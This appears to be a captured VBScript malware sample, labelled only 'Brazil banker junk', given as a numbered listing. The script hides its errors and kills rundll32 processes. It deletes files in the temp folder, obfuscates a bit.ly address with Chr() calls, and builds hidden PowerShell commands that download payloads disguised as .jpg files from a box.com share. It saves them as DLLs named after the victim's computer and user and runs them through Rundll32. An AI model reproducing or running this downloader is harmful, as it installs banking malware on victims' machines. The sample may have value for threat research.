Brazil banker junk

1. VBScript - script block
2. on eRRoR ReSume neXT
3. uRlhoST = "https://img0011021601.box.com/shared/static/"
4. SXRBFR = "5sargpzrcjsyqj14uklmibxrr9hxfjrz.jpg"
5. AKLXQU = "http://" & Chr(98) & Chr(105) & Chr(116) & Chr(46) & Chr(108) & Chr(121) & Chr(47) & "1Qeb1tz" & Chr(34)
6. inSTalldiR = "%temp%"
7. inSTall_id = "drmlb"
8. UFVUWE = "starter"
9. DAGSCQ = "mailstarter"
10. JJPMRX = "kkecmbru28abw8rdrazqacn1tfflrwzb.jpg"
11. inSTall_id2 = "wuovq"
12. SeT Shellobj = wScRiPT.cReaTeobjecT("wScRiPT.Shell")
13. SeT fileSySTemobj = cReaTeobjecT("ScRiPTing.fileSySTemobjecT")
14. inSTalldiR = Shellobj.eXPandenviRonmenTSTRingS(inSTalldiR) & "\"
15. Pcname = Shellobj.eXPandenviRonmenTSTRingS("%comPuTeRname%") & "_"
16. uSeRname = Shellobj.eXPandenviRonmenTSTRingS("%uSeRname%")
17. uSeRname = RePlace(uSeRname, " ", "")
18. STRdiRecToRy = inSTalldiR & Pcname & uSeRname
19. inSTallname = wScRiPT.ScRiPTname
20. YLMQZB = Shellobj.SPecialfoldeRS ("YLMQZB") & "\"
21. PaThfilename = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & ".dll"
22. PaThfilename2 = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & "mail_.dll"
23. MNIISL = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename & chR(44) & UFVUWE & chR(34)
24. TKLKGG = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename2 & chR(44) & DAGSCQ & chR(34)
25. fechaR = "TaSkkill /im Rundll32.eXe"
26. ShelloBj.Run(fechaR),0
27. if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
28. on eRRoR ReSume neXT
29. ShelloBj.Run(fechaR),0
30. WScRiPT.SleeP 1500
31. fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
32. end if
33. if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
34. on eRRoR ReSume neXT
35. ShelloBj.Run(fechaR),0
36. WScRiPT.SleeP 1500
37. fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
38. end if
39. fileSySTemobj.DeleTeFile(inSTalldiR & "*.cfg")
40. 'if noT fileSySTemobj.foldeReXiSTS(STRdiRecToRy) Then
41. ' fileSySTemobj.CReaTeFoldeR(STRdiRecToRy)
42. 'end if
43. PwSh1 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
44. & chR(34) & uRlhoST & SXRBFR & ChR(39) & ChR(44) & ChR(39) & PaThfilename & chR(39) & chR(41) & MNIISL & chR(34)
45. PwSh2 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
46. & chR(34) & uRlhoST & JJPMRX & ChR(39) & ChR(44) & ChR(39) & PaThfilename2 & chR(39) & chR(41) & TKLKGG & chR(34)
47. PwSh3 = "PoweRShell (new-objecT neT.webclienT).downloadSTRing(" & chR(39) & AKLXQU & chR(39) & chR(41) & chR(34)
48. if noT fileSySTemobj.fileeXiSTS (PaThfilename) Then
49. on eRRoR ReSume neXT
50. Shellobj.Run(PwSh1),0
51. Shellobj.Run(PwSh2),0
52. Shellobj.Run(PwSh3),0
53. End If